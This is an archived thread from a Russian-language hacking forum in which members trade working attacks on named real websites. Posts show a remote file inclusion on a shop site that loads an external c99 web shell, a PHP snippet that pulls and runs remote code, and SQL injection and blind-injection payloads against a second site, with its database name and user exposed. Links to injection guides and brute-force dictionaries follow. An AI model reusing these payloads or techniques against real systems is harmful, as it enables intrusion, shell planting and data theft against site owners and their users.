ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.03.2009, 05:11
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1
|
|
|
01.03.2009, 05:18
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от TELO
а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1
ошибку видишь?
Warning: include() [function.include]: Failed opening '13-1.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/host700852/zano.ru/htdocs/shop/index.php on line 204 
|
|
|
|
01.03.2009, 13:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://shop.zano.ru/index.php?act=http://mail.ru/?
ыы
|
|
|
|
01.03.2009, 13:37
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://shop.zano.ru/index.php?act=http://wowbkdo.narod.ru/c99madshell =)))
|
|
|
|
01.03.2009, 14:08
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Всем здрасти
При подборе колонок выводиться
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)
Перебрал 20 колонок все так же
URL:
http://frutonyanya.ru/php/news.php?c=1'
 |
|
|
|
01.03.2009, 14:29
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Pashkela в своём духе =)
Код:
if(isset($_GET['cmd'])){$f=require("http://pashkela.narod.ru/tema1.txt");die($f);}
Файлик -абревиатура от вебмани
diznt, там же ясно пишет. Запрещен микс груп бай и других параметров, кроме мин, макс, каунт...
|
|
|
|
01.03.2009, 14:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от diznt
Всем здрасти
При подборе колонок выводиться
Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)
Перебрал 20 колонок все так же
URL:
http://frutonyanya.ru/php/news.php?c=1'
https://forum.antichat.ru/showpost.php?p=966458&postcount=3908
советую забить на скулю доступа к information_schema нет
http://frutonyanya.ru/php/news.php?c=77+group+by+'cc'+and+(select+1+from+inf ormation_schema.tables)--
//add а ну да не обратил внимания на ветку=) 4.1
Последний раз редактировалось l1ght; 01.03.2009 в 14:36..
|
|
|
|
01.03.2009, 14:30
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 diznt
blind sql injection
version: 4.1.22-log
database : frutony3_fn
user : frutony3_fn@localhost
http://frutonyanya.ru/php/news.php?n=25&c=49+AND+ASCII(SUBSTRING((select+use r()),1,1))>x
|
|
|
|
01.03.2009, 14:38
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Где можно почитать о блинд скуль инъекциях?
|
|
|
|
01.03.2009, 14:43
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
[MySQL/SQL-inj] SQL injection полный FAQ Там же скрипты для вывода всех записей из таблицы, брута имен столбцов и полей.
SQL injection полный FAQ: системные переменные SQL injection полный FAQ: прелести двойного запроса Вообще очень и очень полезная вещь, прошу особенно обратить внимание на неё - случаи когда права на файлы у пользователя БД есть, но кавычки экранируются более чем частые.
И как показывает практика найти, читая сорцы найти, уязвимый запрос, данные из которого подставляются в другой запрос, более чем реально, а результат шелл.
Так же имейте ввиду что иногда, данные из запроса подставляются в функции include() или eval() - тут надо следить за выводом ошибок при SQL инъекции.
Новая SQL Injection Tool 4
SQL инъекция (в т.ч. и blind SQL) SQL инъекция (в т.ч. и blind SQL): Работа с инъекциями в MySQL третьей версии. SQL инъекция (в т.ч. и blind SQL): Скрипт для работы со слепыми инъекциями. Там же можно найти словари для брута имён таблиц и колонок, а вот и ещё:
SQL databases [antichat] sql4 dictionary Имена таблиц Новая альтернатива Benchmark'y или эффективный blind SQL-injection Справочное руководство по MySQL Мануалы с офф сайта (English), по версиям: 3.23, 4.0, 4.1 5.0 5.1 6.0 by Grey |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид